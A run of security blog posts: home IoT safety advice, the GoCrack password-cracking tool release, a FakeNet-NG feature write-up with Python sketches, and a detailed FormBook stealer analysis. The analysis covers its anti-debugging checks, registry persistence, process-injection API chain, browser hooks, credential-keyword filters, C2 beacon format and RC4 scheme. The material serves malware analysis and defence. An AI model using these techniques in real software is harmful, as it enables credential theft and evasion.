
Best Practices for Keeping Tabs on Your Apps

Let’s start this conversation out with the definition of device. The list of what constitutes one is growing. For now, let’s say that you have a home computer (desktop, laptop, or both), work computer (desktop, laptop, or both), home tablet, work tablet, personal smartphone, and work smartphone. This is a pretty extensive list of devices that an adversary could use to attack you professionally and personally. But what about your Amazon Alexa or gadgets, smart toys, and smart clocks? What about Google Assistant or Microsoft Cortana? Do you also have a SmartTV? What about NEST, Wink, WeMo, SensorPush, Neurio, ecobee4, Philips Hue, Smart Lock, GarageMate? Hoo boy! The list of connected devices goes on and on.

Are all of these devices safe to use? The simple answer is no, unless you have specifically paid attention to their security. And for smart devices that work via voice control, do you know who might be listening on the other end? To make things worse, many of these devices are also used in the corporate world because they are easy to deploy and very affordable.

What about applications? Did the developer that created the application you are using ensure they used good secure coding techniques? Or is there a likelihood they introduced a flaw in their code? Are the servers for the application you are running in the cloud secure? Is the data you are storing on these cloud systems protected from unauthorized access?

All really good questions we rarely ask ourselves—at least before we use the latest and coolest applications available. We all make risk-based decisions every day, but do we ever ensure we have all the data before we make that risk-based decision?

What Can You Do?

Start by doing whatever homework and research you can. Make sure you understand the social engineering methods that malicious actors are currently using. Unsolicited phone calls from a government agency (like the IRS), a public utility, or even Microsoft or Apple are not legitimate. No, you don't owe back taxes; no, your computer has not been hacked; and no, you don't need to give out sensitive personal information to your power company over the phone.

How Can You Choose Safe Applications?

Simply Google "Is this <name of application> secure?" Never install an application that you don't feel you can trust. Using an application is all about risk management. Make sure you understand the potential risk of device and data compromise before choosing to use it.

How Can You Better Secure Your Home Network?

  1. Upon installation of any device, immediately change the login and password. The default credentials are often listed in the configuration documentation that comes with the product and are therefore easy to look up.
  2. Change the login and password on your home Wi-Fi router frequently.
  3. Ensure the software for anything that connects is up to date.
  4. Make sure you have a clear sense of where your sensitive data is stored—and how it is protected. Is it adequately protected—or, better yet, encrypted?
  5. When in doubt, don’t connect an IoT device to the Internet.

Lastly, look at solutions that can be added to your home Wi-Fi network to provide additional layers of protection and detection against IoT and other advanced attacks. F-Secure Sense Gadget is one such solution, as are the Luma smart Wi-Fi router, Dojo, and CUJO. Dojo, for example, monitors all incoming and outgoing traffic and performs analysis looking for malicious traffic. With known weaknesses in IoT and home networks in general, solutions like these are a good investment.

Don’t Give Hackers Easy Access

Not long ago, a casino in the Northeast had a fish tank in their lobby. To make management of the fish tank easier, they installed an IoT-enabled thermostatic control to set and monitor water temperature in the tank. The thermostatic control was connected to their internal network, as well as IoT-enabled to allow easy access from anywhere on the Internet. The device was breached from the Internet by malicious actors, and the internal network was penetrated, allowing the hackers to steal information from a high-roller database before devices monitoring the network were able to identify the unauthorized data leaving the network and shut it down. A classic case of what can happen without the right due diligence.

Try to follow this motto: just because you can does not mean you should. The latest shiny IT gadget that will make you seem cool, or potentially make some portion of your life easier to manage, should be evaluated thoroughly for security weaknesses before you turn it on and open it up to the world. Make that good risk-based decision. Not many of us would consider doing this: "Hey Alexa, open up my desktop computer so that all my sensitive data is opened for all the world to see." Or would we?

The post Best Practices for Keeping Tabs on Your Apps appeared first on Connected.

Introducing GoCrack: A Managed Password Cracking Tool

FireEye's Innovation and Custom Engineering (ICE) team released a tool today called GoCrack that allows red teams to efficiently manage password cracking tasks across multiple GPU servers by providing an easy-to-use, web-based real-time UI (Figure 1 shows the dashboard) to create, view, and manage tasks. Simply deploy a GoCrack server along with a worker on every GPU/CPU capable machine and the system will automatically distribute tasks across those GPU/CPU machines.

Figure 1: Dashboard

As readers of this blog probably know, password cracking tools are an effective way for security professionals to test password effectiveness, develop improved methods to securely store passwords, and audit current password requirements. Some use cases for a password cracking tool can include cracking passwords on exfil archives, auditing password requirements in internal tools, and offensive/defensive operations. We’re releasing GoCrack to provide another tool for distributed teams to have in their arsenal for managing password cracking and recovery tasks.

Keeping in mind the sensitivity of passwords, GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or have been granted access to the task. Modifications to a task, viewing of cracked passwords, downloading a task file, and other sensitive actions are logged and available for auditing by administrators. Engine files (files used by the cracking engine), such as dictionaries and mangling rules, can be uploaded as "Shared", which allows other users to use them in tasks without granting the ability to download or edit them. This allows sensitive dictionaries to be used without exposing their contents.

Figure 2 shows a task list, Figure 3 shows the “Realtime Status” tab for a task, and Figure 4 shows the “Cracked Passwords” tab.

Figure 2: Task Listing

Figure 3: Task Status

Figure 4: Cracked Passwords Tab

GoCrack ships with support for hashcat v3.6+, requires no external database server (it uses a flat file), and supports both LDAP and database-backed authentication. In the future, we plan to add support for MySQL and PostgreSQL database engines for larger deployments, the ability to manage and edit files in the UI, automatic task expiration, and greater configuration of the hashcat engine. We're shipping with Dockerfiles to help jumpstart users with GoCrack. The server component can run on any Linux server with Docker installed. Users with NVIDIA GPUs can use NVIDIA Docker to run the worker in a container with full access to the GPUs.

GoCrack is available immediately for download along with its source code on the project's GitHub page. If you have any feature requests, questions, or bug reports, please file an issue in GitHub.

ICE is a small, highly trained team of engineers that incubates and delivers capabilities that matter to our products, our clients, and our customers. ICE is always looking for exceptional candidates interested in solving challenging problems quickly. If you’re interested, check out FireEye careers.

New FakeNet-NG Feature: Content-Based Protocol Detection

I (Matthew Haigh) recently contributed to FLARE’s FakeNet-NG network simulator by adding content-based protocol detection and configuration. This feature is useful for analyzing malware that uses a protocol over a non-standard port; for example, HTTP over port 81. The new feature also detects and adapts to SSL, so any protocol can be used with SSL and handled appropriately by FakeNet-NG. We added this feature because it existed in the original FakeNet and was needed for real-world malware.

What is FakeNet-NG?

FakeNet-NG simulates a network so malware analysts can run samples with network functionality without the risks of an Internet connection. Analysts can examine network-based indicators via FakeNet-NG’s textual and pcap output. It is plug-and-play, configurable, and works on both Windows and Linux. FakeNet-NG simulates common protocols to trick malware into thinking it is connected to the Internet. FakeNet-NG supports the following protocols: DNS, HTTP, FTP, POP, SMTP, IRC, SSL, and TFTP.

Previous Design

Previously FakeNet-NG employed Listener modules, which were bound to configurable ports for each protocol. Any traffic on those ports was received by the socket and processed by the Listener. 

In the previous architecture, packets were redirected using a Diverter module that utilized WinDivert for Windows and netfilter for Linux. Each incoming and outgoing packet was examined by the Diverter, which kept a running list of connections. Packets destined for outbound ports were redirected to a default Listener, which would respond to any packet with an echo of the same data. The Diverter also redirected packets based on whether FakeNet-NG was run in Single-Host or Multi-Host mode, and if any applications were blacklisted or whitelisted according to the configuration. It would simply release the packet on the appropriate port and the intended Listener would receive it on the socket.

New Design

My challenge was to eliminate this port/protocol dependency. In order to disassociate the Listeners from the corresponding ports, a new architecture was needed. The first challenge was to maintain Listener functionality. The original architecture relied on Python libraries that interact with the socket, so we needed to maintain “socket autonomy” in the Listener. We therefore added a “taste()” function to each Listener. The routine returns a confidence score based on the likelihood that the packet is associated with the protocol. Figure 1 demonstrates the taste() routine for HTTP, which looks for the request method string at the beginning of the packet data and gives an additional point if the packet is on a common HTTP port.

There were several choices for how these scores could be tabulated. It could not happen in the Diverter because of the TCP handshake: the Diverter could not sample data from data-less handshake packets, and if the Diverter completed the handshake, the connection could not easily be passed to a different socket at the Listener without disrupting the connection.

Figure 1: HTTP taste() example
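As a rough illustration of the approach (not FakeNet-NG's exact code), an HTTP taste() routine might look like the sketch below; the method list, port set, and score weights are assumptions chosen for illustration:

```python
# Sketch of a protocol-detection taste() routine in the spirit of
# FakeNet-NG's HTTP Listener. The method list, port set, and score
# weights here are illustrative assumptions, not the tool's exact values.
HTTP_METHODS = (b"GET", b"POST", b"HEAD", b"PUT", b"DELETE", b"OPTIONS")
COMMON_HTTP_PORTS = {80, 8080, 8000}

def taste(data: bytes, dport: int) -> int:
    """Return a confidence score that `data` is an HTTP request."""
    score = 0
    if data.lstrip().startswith(HTTP_METHODS):
        score += 2  # request line begins with an HTTP method string
    if dport in COMMON_HTTP_PORTS:
        score += 1  # bonus point for a common HTTP port
    return score
```

With this scheme, an HTTP request on port 81 still outscores the default echo server, which is the point of content-based detection.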


We ultimately decided to add a proxy Listener that maintains full-duplex connections with the client and the Listener, with both sides unaware of the other. This solves the handshake problem and maintains socket autonomy at the Listener. The proxy is also easily configurable and enables new functionality. We substituted the proxy for the echo-server default Listener, which would receive traffic destined for unbound ports. The proxy peeks at the data on the socket, polls the Listeners, and creates a new connection with the Listener that returns the highest score. The echo-server always returns a score of one, so it will be chosen if no better option is detected.

The analyst controls which Listeners are bound to ports and which Listeners are polled by the proxy. This means that the Listeners do not have to be exposed at all; everything can be decided by the proxy. The user can set the Hidden option in the configuration file to False to ensure the Listener will be bound to the port indicated in the configuration file. Setting Hidden to True will force any packets to go through the proxy before accessing the Listener. For example, if the analyst suspects that malware is using FTP on port 80, she can ‘hide’ HTTP from catching the traffic and let the proxy detect FTP and forward the packet to the FTP Listener. Additional configuration options exist for choosing which protocols are polled by the proxy. See Figure 2 and Figure 3 for configuration examples: Figure 2 is a basic configuration for a Listener, and Figure 3 demonstrates how the proxy is configurable for TCP and UDP.

Figure 2: Listener Configuration Options

Figure 3: Proxy Configuration Options
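The polling step described above can be sketched in a few lines; the Listener classes here are simplified stand-ins for FakeNet-NG's actual modules, not its real implementation:

```python
# Simplified sketch of the proxy's Listener-polling logic. The
# Listener classes and scores are illustrative stand-ins, not
# FakeNet-NG's actual modules.
class RawListener:                      # the echo-server default
    name = "RawListener"
    def taste(self, data: bytes, dport: int) -> int:
        return 1                        # always willing, lowest priority

class HTTPListener:
    name = "HTTPListener"
    def taste(self, data: bytes, dport: int) -> int:
        return 2 if data.startswith((b"GET ", b"POST")) else 0

def pick_listener(data: bytes, dport: int, listeners):
    # Peek at the data, poll every hidden Listener, and hand the
    # connection to the highest scorer; RawListener's constant score
    # of one wins only when nothing better matches.
    return max(listeners, key=lambda l: l.taste(data, dport))
```

For example, `pick_listener(b"GET / HTTP/1.1", 81, [RawListener(), HTTPListener()])` selects the HTTP Listener even though port 81 is non-standard, while unrecognized binary traffic falls through to the echo server.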

The proxy also handles SSL detection. Before polling the Listeners, the proxy examines the packet. If SSL is detected, the proxy “wraps” the socket in SSL using Python’s OpenSSL library. With the combination of protocol and SSL detection, each independent of the other, FakeNet-NG can now handle just about any protocol combination.
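A minimal sketch of such SSL detection, assuming a check on the TLS record header (FakeNet-NG's actual heuristic may differ):

```python
def looks_like_tls(data: bytes) -> bool:
    # A TLS/SSL handshake record starts with content type 0x16
    # (handshake) followed by a version field of 0x03,0x00 through
    # 0x03,0x03 (SSL 3.0 through TLS 1.2). This is a heuristic sketch,
    # not FakeNet-NG's exact check.
    return (
        len(data) >= 3
        and data[0] == 0x16
        and data[1] == 0x03
        and data[2] <= 0x03
    )
```

When the check succeeds, the proxy can wrap the accepted socket in SSL (e.g., via pyOpenSSL, as the post describes) before polling the Listeners for the inner protocol.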

The proxied SSL implementation also allows for improved packet analysis. The connection between the proxy and the Listener is not encrypted, which allows FakeNet-NG to dump unencrypted packets to the pcap output. This makes it easier for the analyst to examine the packet data. FakeNet-NG continues to produce pcap output that includes packet data before and after modification. While this results in repetitive data, it is often useful to see the original packet alongside the modified one.


Figure 4 shows verbose (-v) output from FakeNet-NG on Windows responding to an HTTP request on port 81 from a clowncar malware variant (SHA-256 8d2dfd609bcbc94ff28116a80cf680660188ae162fc46821e65c10382a0b44dc). Malware such as clowncar uses traditional protocols over non-standard ports for many reasons. FakeNet-NG gives the malware analyst the flexibility to detect and respond to these cases automatically.

Figure 4: clowncar malware using HTTP on port 81


FLARE’s FakeNet-NG tool is a powerful network-simulation tool available for Windows and Linux. The new content-based protocol detection and SSL detection features ensure that FakeNet-NG remains the most useful tool for malware analysts. Configuration options give programmers the flexibility necessary to respond to malware using most protocols on any port.

Significant FormBook Distribution Campaigns Impacting the U.S. and South Korea

We observed several high-volume FormBook malware distribution campaigns primarily targeting the Aerospace, Defense Contractor, and Manufacturing sectors within the U.S. and South Korea during the past few months. The attackers involved in these email campaigns leveraged a variety of distribution mechanisms to deliver the information-stealing FormBook malware, including:

  • PDFs with download links
  • DOC and XLS files with malicious macros
  • Archive files (ZIP, RAR, ACE, and ISOs) containing EXE payloads

The PDF and DOC/XLS campaigns primarily impacted the United States, while the Archive campaigns largely impacted the United States and South Korea.

FormBook Overview

FormBook is a data stealer and form grabber that has been advertised in various hacking forums since early 2016. Figure 1 and Figure 2 show the online advertisement for the malware.

Figure 1: FormBook advertisement

Figure 2: FormBook underground pricing

The malware injects itself into various processes and installs function hooks to log keystrokes, steal clipboard contents, and extract data from HTTP sessions. The malware can also execute commands from a command and control (C2) server. The commands include instructing the malware to download and execute files, start processes, shutdown and reboot the system, and steal cookies and local passwords.

One of the malware's most interesting features is that it reads Windows’ ntdll.dll module from disk into memory, and calls its exported functions directly, rendering user-mode hooking and API monitoring mechanisms ineffective. The malware author calls this technique "Lagos Island method" (allegedly originating from a userland rootkit with this name). 

It also features a persistence method that randomly changes the path, filename, file extension, and the registry key used for persistence. 

The malware author does not sell the builder; they sell only the panel and generate the executable files as a service.


FormBook is a data stealer, but not a full-fledged banker (banking malware). It does not currently have any extensions or plug-ins. Its capabilities include:

  • Key logging
  • Clipboard monitoring
  • Grabbing HTTP/HTTPS/SPDY/HTTP2 forms and network requests
  • Grabbing passwords from browsers and email clients
  • Screenshots

FormBook can receive the following remote commands from the C2 server: 

  • Update bot on host system
  • Download and execute file
  • Remove bot from host system
  • Launch a command via ShellExecute
  • Clear browser cookies
  • Reboot system
  • Shutdown system
  • Collect passwords and create a screenshot
  • Download and unpack ZIP archive


The C2 domains typically leverage less widespread, newer generic top-level domains (gTLDs) such as .site, .website, .tech, .online, and .info.

The C2 domains used for this recently observed FormBook activity have been registered using the WhoisGuard privacy protection service, and the server infrastructure is hosted by a Ukrainian hosting provider. Each server typically has multiple FormBook panel installation locations, which could be indicative of an affiliate model.

Behavior Details

File Characteristics

Our analysis in this blog post is based on the following representative sample:


MD5 Hash:
Size (bytes):
Compile Time: 2012-06-09 13:19:49Z

Table 1: FormBook sample details


The malware is a self-extracting RAR file that starts an AutoIt loader. The AutoIt loader compiles and runs an AutoIt script. The script decrypts the FormBook payload file, loads it into memory, and then executes it.


The FormBook malware copies itself to a new location. The malware first chooses one of the following strings to use as a prefix for its installed filename:

ms, win, gdi, mfc, vga, igfx, user, help, config, update, regsvc, chkdsk, systray, audiodg, certmgr, autochk, taskhost, colorcpl, services, IconCache, ThumbCache, Cookies

It then generates two to five random characters, appends them to the chosen string, and adds one of the following file extensions:

  • .exe, .com, .scr, .pif, .cmd, .bat
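The filename generation described above can be sketched as follows; the prefixes and extensions are taken from the lists in this post, while the random-character alphabet is an assumption, since the post does not specify it:

```python
import random
import string

# Prefixes and extensions as listed in the post; the character set
# used for the random suffix is an illustrative assumption.
PREFIXES = [
    "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help",
    "config", "update", "regsvc", "chkdsk", "systray", "audiodg",
    "certmgr", "autochk", "taskhost", "colorcpl", "services",
    "IconCache", "ThumbCache", "Cookies",
]
EXTENSIONS = [".exe", ".com", ".scr", ".pif", ".cmd", ".bat"]

def random_install_name() -> str:
    """Prefix + two to five random characters + a random extension."""
    suffix = "".join(
        random.choices(string.ascii_lowercase, k=random.randint(2, 5))
    )
    return random.choice(PREFIXES) + suffix + random.choice(EXTENSIONS)
```

Because the prefixes mimic legitimate Windows component names, a generated name like `taskhostqx.exe` blends in with real system binaries.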

If the malware is running with elevated privileges, it copies itself to one of the following directories:

  • %ProgramFiles% 
  • %CommonProgramFiles%

If running with normal privileges, it copies itself to one of the following directories:

  • %TEMP%


For the registry value name, the malware again chooses a prefix from the same string list, appends one to five random characters, and uses the result as the value name.

The malware configures persistence to one of the following two locations depending on its privileges:

  • (HKCU|HKLM)\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • (HKCU|HKLM)\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run


The malware creates two 16-byte mutexes. The first mutex is the client identifier (e.g., 8-3503835SZBFHHZ). The second mutex value is derived from the C2 information and the username (e.g., LL9PSC56RW7Bx3A5). 

The malware then iterates over a process listing and calculates a checksum value of process names (rather than checking the name itself) to figure out which process to inject. The malware may inject itself into browser processes and explorer.exe. Depending on the target process, the malware installs different function hooks (see the Function Hooks section for further detail).
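Comparing checksums rather than strings is cheap to reproduce; the sketch below uses CRC32 of the lowercased name, though FormBook's exact checksum variant and name normalization are assumptions here:

```python
import zlib

def name_checksum(proc_name: str) -> int:
    # Illustrative: CRC32 of the lowercased process name. FormBook's
    # exact normalization and checksum variant are not documented here.
    return zlib.crc32(proc_name.lower().encode()) & 0xFFFFFFFF

# Hard-coding checksums instead of names hides the target list from
# simple string searches of the binary.
TARGET_CHECKSUMS = {
    name_checksum(n) for n in ("explorer.exe", "chrome.exe", "firefox.exe")
}

def is_injection_target(proc_name: str) -> bool:
    return name_checksum(proc_name) in TARGET_CHECKSUMS
```

This is why static analysis of such samples turns up checksum constants rather than the readable process names an analyst might expect.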


The malware uses several techniques to complicate malware analysis: 

  • Timing checks using the RDTSC instruction
  • Calls NtQueryInformationProcess with InfoClass=7 (ProcessDebugPort)
  • Sample path and filename checks (sample filename must be shorter than 32 characters)
  • Hash-based module blacklist
  • Hash-based process blacklist
  • Hash-based username blacklist
  • Before communicating, it checks whether the C2 server is present in the hosts file

The results of these tests are then placed into a 16-byte array, and a SHA1 hash is calculated on the array, which will later be used as the decryption key for subsequent strings (e.g., DLL names to load). Failed checks may go unnoticed until the sample tries to load the supporting DLLs (kernel32.dll and advapi32.dll).

The correct 16-byte array holding the result of the checks is: 

  • 00 00 01 01 00 00 01 00 01 00 01 00 00 00 00 00 

This array has a SHA1 value of:

  • 5b85aaa14f74e7e8adb93b040b0914a10b8b19b2 

After completing all anti-analysis checks, the sample manually maps ntdll.dll from disk into memory and uses its exported functions directly in the code. All API functions will have a small stub function in the code that looks up the address of the API in the mapped ntdll.dll using the CRC32 checksum of the API name, and sets up the parameters on the stack. 

This will be followed by a direct register call to the mapped ntdll.dll module. This makes regular debugger breakpoints on APIs inoperable, as execution will never go through the system mapped ntdll.dll.

Process Injection

The sample loops through all the running processes to find explorer.exe by the CRC32 checksum of its process name. It then injects into explorer.exe using the following API calls (avoiding more commonly identifiable techniques such as WriteProcessMemory and CreateRemoteThread):

  • NtMapViewOfSection
  • NtSetContextThread
  • NtQueueUserAPC

The injected code in the hijacked instance of explorer.exe randomly selects and launches (as a suspended process) a built-in Windows executable from the following list: 

  • svchost.exe, msiexec.exe, wuauclt.exe, lsass.exe, wlanext.exe, msg.exe, lsm.exe, dwm.exe, help.exe, chkdsk.exe, cmmon32.exe, nbtstat.exe, spoolsv.exe, rdpclip.exe, control.exe, taskhost.exe, rundll32.exe, systray.exe, audiodg.exe, wininit.exe, services.exe, autochk.exe, autoconv.exe, autofmt.exe, cmstp.exe, colorcpl.exe, cscript.exe, explorer.exe, WWAHost.exe, ipconfig.exe, msdt.exe, mstsc.exe, NAPSTAT.EXE, netsh.exe, NETSTAT.EXE, raserver.exe, wscript.exe, wuapp.exe, cmd.exe 

The original process reads the randomly selected executable from the memory of explorer.exe and migrates into this new process via NtMapViewOfSection, NtSetContextThread, and NtQueueUserAPC. 

The new process then deletes the original sample and sets up persistence (see the Persistence section for more detail). It then goes into a loop that constantly enumerates running processes and looks for targets based on the CRC32 checksum of the process name. 

Targeted process names include, but are not limited to: 

  • iexplore.exe, firefox.exe, chrome.exe, MicrosoftEdgeCP.exe, explorer.exe, opera.exe, safari.exe, torch.exe, maxthon.exe, seamonkey.exe, avant.exe, deepnet.exe, k-meleon.exe, citrio.exe, coolnovo.exe, coowon.exe, cyberfox.exe, dooble.exe, vivaldi.exe, iridium.exe, epic.exe, midori.exe, mustang.exe, orbitum.exe, palemoon.exe, qupzilla.exe, sleipnir.exe, superbird.exe, outlook.exe, thunderbird.exe, totalcmd.exe

After injecting into any of the target processes, it sets up user-mode API hooks based on the process. 

The malware installs different function hooks depending on the process. The primary purpose of these function hooks is to log keystrokes, steal clipboard data, and extract authentication information from browser HTTP sessions. The malware stores data in local password log files. The directory name is derived from the C2 information and the username (the same as the second mutex created above: LL9PSC56RW7Bx3A5). 

However, only eight bytes from this value are used as the directory name (e.g., LL9PSC56). Next, the first three characters of the derived directory name are used as a prefix for the log file, followed by the string "log". Following this prefix are names corresponding to the type of log file. For example, for Internet Explorer passwords, the following log file would be created:

  • %APPDATA%\LL9PSC56\LL9logri.ini

The following are the password log filenames without the prefix:

  • (no name): Keylog data
  • rg.ini: Chrome passwords
  • rf.ini: Firefox passwords
  • rt.ini: Thunderbird passwords
  • ri.ini: Internet Explorer passwords
  • rc.ini: Outlook passwords
  • rv.ini: Windows Vault passwords
  • ro.ini: Opera passwords

One additional file that does not use the .INI file extension is a screenshot file:

  • im.jpeg
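The derivation of the log directory and filenames can be reproduced directly from the example values above:

```python
def password_log_path(mutex_value: str, suffix: str = "ri.ini") -> str:
    """Derive a FormBook password-log path from the second mutex value.

    Only the first eight characters become the directory name, and the
    directory's first three characters plus "log" prefix each log file,
    as described in the post.
    """
    directory = mutex_value[:8]                  # e.g. "LL9PSC56"
    filename = directory[:3] + "log" + suffix    # e.g. "LL9logri.ini"
    return "%APPDATA%\\" + directory + "\\" + filename
```

For instance, `password_log_path("LL9PSC56RW7Bx3A5")` yields `%APPDATA%\LL9PSC56\LL9logri.ini`, the Internet Explorer password log from the example above.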

Function Hooks

Keylog/clipboard monitoring:

  • GetMessageA
  • GetMessageW
  • PeekMessageA
  • PeekMessageW
  • SendMessageA
  • SendMessageW

Browser hooks:

  • PR_Write
  • HttpSendRequestA
  • HttpSendRequestW
  • InternetQueryOptionW
  • EncryptMessage
  • WSASend

The browser hooks look for certain strings in the content of HTTP requests and, if a match is found, information about the request is extracted. The targeted strings are:

  • pass
  • token
  • email
  • login
  • signin
  • account
  • persistent
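Filtering on these substrings reduces the hooked traffic to requests likely to carry credentials; a minimal sketch of the matching step (case-insensitive matching is an assumption for illustration):

```python
# The targeted substrings listed in the post; case-insensitive
# matching is an illustrative assumption.
TARGET_STRINGS = (
    b"pass", b"token", b"email", b"login",
    b"signin", b"account", b"persistent",
)

def request_is_interesting(body: bytes) -> bool:
    """Return True if HTTP request content mentions a targeted string."""
    lowered = body.lower()
    return any(s in lowered for s in TARGET_STRINGS)
```

A login POST such as `user=alice&pass=secret` matches on "pass", while an ordinary page fetch is ignored.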

Network Communications

The malware communicates with the following C2 server using HTTP requests: 

  • www[.]clicks-track[.]info/list/hx28/


As seen in Figure 3, FormBook sends a beacon request (controlled by a timer/counter) using HTTP GET with an "id" parameter in the URL.

Figure 3: FormBook beacon

The decoded "id" parameter is as follows:

  • FBNG:134C0ABB 2.9:Windows 7 Professional x86:VXNlcg==


  • "FBNG" – magic bytes
  • "134C0ABB" – the CRC32 checksum of the user's SID
  • "2.9" – the bot version
  • "Windows 7 Professional" – operating system version
  • "x86" – operating system architecture
  • "VXNlcg==" – the Base64-encoded username (i.e., "User" in this case)
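The decoded beacon splits mechanically into those fields; the parser below is an illustrative sketch based only on the single example string shown above, so real beacons may deviate from this layout:

```python
import base64

def parse_formbook_id(decoded: str) -> dict:
    """Split a decoded FormBook "id" beacon into its fields.

    Sketch based on the one observed example; the field layout is an
    assumption generalized from that string.
    """
    magic, crc_and_ver, os_and_arch, user_b64 = decoded.split(":")
    sid_crc32, version = crc_and_ver.split(" ")
    os_name, arch = os_and_arch.rsplit(" ", 1)
    return {
        "magic": magic,
        "sid_crc32": sid_crc32,
        "bot_version": version,
        "os": os_name,
        "arch": arch,
        "username": base64.b64decode(user_b64).decode(),
    }
```

Parsing "FBNG:134C0ABB 2.9:Windows 7 Professional x86:VXNlcg==" recovers the username "User" along with the OS and bot version fields.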

Communication Encryption

The malware sends HTTP requests using the hard-coded HTTP header values shown in Figure 4.

Figure 4: Hard-coded HTTP header values

Messages to the C2 server are sent RC4 encrypted and Base64 encoded. The malware uses a slightly altered Base64 alphabet, and also uses the character "." instead of "=" as the pad character:

  • Standard Alphabet: 
    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  • Modified Alphabet: 
    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_

The RC4 key is created by applying an implementation of the SHA1 hashing algorithm to the C2 URL. The standard SHA1 algorithm reverses the DWORD endianness at the end of the algorithm; this implementation does not, which results in reverse-endian DWORDs. For example, the SHA1 hash for the aforementioned URL is "9b198a3cfa6ff461cc40b754c90740a81559b9ae," but reordering the DWORDs produces the correct RC4 key: 3c8a199b61f46ffa54b740cca84007c9aeb95915. The first DWORD "9b198a3c" becomes "3c8a199b."
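Both transformations are easy to reproduce. The sketch below decodes the modified Base64 (which is equivalent to the URL-safe alphabet with "." padding) and performs the DWORD byte-swap on the example digest from this post:

```python
import base64

def formbook_b64decode(data: str) -> bytes:
    # The modified alphabet replaces "+/" with "-_" (i.e., the
    # URL-safe Base64 alphabet) and pads with "." instead of "=".
    return base64.urlsafe_b64decode(data.replace(".", "="))

def swap_dword_endianness(hex_digest: str) -> str:
    """Reverse the byte order within each 32-bit word of a digest."""
    raw = bytes.fromhex(hex_digest)
    return b"".join(
        raw[i:i + 4][::-1] for i in range(0, len(raw), 4)
    ).hex()

# The example from the post: swapping the standard SHA1 digest
# recovers the RC4 key.
assert (
    swap_dword_endianness("9b198a3cfa6ff461cc40b754c90740a81559b9ae")
    == "3c8a199b61f46ffa54b740cca84007c9aeb95915"
)
```

The same swap routine works in either direction, since reversing each four-byte word twice returns the original digest.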

Figure 5 shows an example HTTP POST request.

Figure 5: Example HTTP POST request

In this example, the decoded result is: 

  • Clipboard\r\n\r\nBlank Page - Windows Internet Explorer\r\n\r\ncEXN{3wutV,

Accepted Commands

When a command is sent by the C2 server, the HTTP response body has the format shown in Figure 6.

Figure 6: FormBook C2 server response with command

The data begins with the magic bytes "FBNG" and a one-byte command code from hex bytes 31 to 39 (i.e., from "1" to "9") in clear text. This is followed by the RC4-encrypted command data (where the RC4 key is the same as the one used for the request). In the decrypted data, another occurrence of the FBNG magic bytes indicates the end of the command data.
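That framing can be parsed with a few lines of code. The RC4 routine below is a standard implementation, and the parser is a sketch of the format as described, not FormBook's own code:

```python
def rc4(data: bytes, key: bytes) -> bytes:
    """Standard RC4 (symmetric: the same routine encrypts and decrypts)."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # keystream generation
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def parse_c2_response(body: bytes, key: bytes):
    """Parse the described framing: "FBNG" + command byte + RC4 data
    terminated by another FBNG marker (a sketch of the format)."""
    if body[:4] != b"FBNG":
        raise ValueError("missing FBNG magic")
    command = chr(body[4])                     # '1' through '9'
    plaintext = rc4(body[5:], key)
    return command, plaintext[: plaintext.find(b"FBNG")]
```

A round trip with a hypothetical key and payload confirms that the command byte stays in clear text while only the trailing data is encrypted.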

The malware accepts the commands shown in Table 2.


Command      Action
'1' (0x31)   Download and execute file from %TEMP% directory
'2' (0x32)   Update bot on host machine
'3' (0x33)   Remove bot from host machine
'4' (0x34)   Launch a command via ShellExecute
'5' (0x35)   Clear browser cookies
'6' (0x36)   Reboot operating system
'7' (0x37)   Shutdown operating system
'8' (0x38)   Collect email/browser passwords and create a screenshot
'9' (0x39)   Download and unpack ZIP archive into %TEMP% directory

Table 2: FormBook accepted commands

Distribution Campaigns

FireEye researchers observed FormBook distributed via email campaigns using a variety of different attachments:

  • PDFs with links to a URL-shortening service, which then redirected to a staging server that contained FormBook executable payloads
  • DOC and XLS attachments that contained malicious macros that, when enabled, initiated the download of FormBook payloads
  • ZIP, RAR, ACE, and ISO attachments that contained FormBook executable files

The PDF Campaigns

The PDF campaigns leveraged FedEx and DHL shipping/package delivery themes (Figure 7 and Figure 8), as well as a document-sharing theme. The PDFs distributed did not contain malicious code, just a link to download the FormBook payload.

The staging servers (shown in Table 3) appeared to be compromised websites.

Figure 7: Example PDF campaign email lure with attachment

Figure 8: Example PDF campaign attachment

Sample Subject Lines | Shortened URLs | Staging Servers

<Recipient’s_Name> - You have a parcel awaiting pick up
<Recipient’s_Name> – I shared a file with you

Table 3: Observed email subjects and download URLs for the PDF campaign

Based on data from the links, there were a total of 716 hits across 36 countries. As seen in Figure 9, most of the malicious activity from the PDF campaign impacted the United States.

Figure 9: Geolocation statistics from URL shortener

The DOC/XLS Campaigns

The email campaigns distributing DOC and XLS files relied on the use of malicious macros to download the executable payload. When the macros are enabled, the download URL retrieves an executable file with a PDF extension. Table 4 shows observed email subjects and download URLs used in these campaigns.

Sample Subject Lines | Staging Server | URL Paths

ACS PO 1528

Table 4: Observed email subjects and download URLs for the DOC/XLS campaign

FireEye detection technologies observed this malicious activity between Aug. 11 and Aug. 22, 2017 (Figure 10). Much of the activity was observed in the United States (Figure 11), and the most targeted industry vertical was Aerospace/Defense Contractors (Figure 12).

Figure 10: DOC/XLS campaign malicious activity by date

Figure 11: Top 10 countries affected by the DOC/XLS campaign

Figure 12: Top 10 industry verticals affected by the DOC/XLS campaign

The Archive Campaign

The Archive campaign delivered a variety of archive formats, including ZIP, RAR, ACE, and ISO, and accounted for the highest distribution volume. It leveraged a myriad of subject lines that were characteristically business related and often regarding payment or purchase orders:

Sample Subject Lines

  • MT103 PAYMENT CONFIRMATION Our Ref: BCCMKE806868TSC Counterparty:.
  • Fwd: INQUIRY RFQ-18 H0018
  • Fw: Remittance Confirmation
  • PO. NO.: 10701 - Send Quotaion Pls
  • Re: bgcqatar project
  • Re: August korea ORDER
  • Purchase Order #234579
  • purchase order for August017

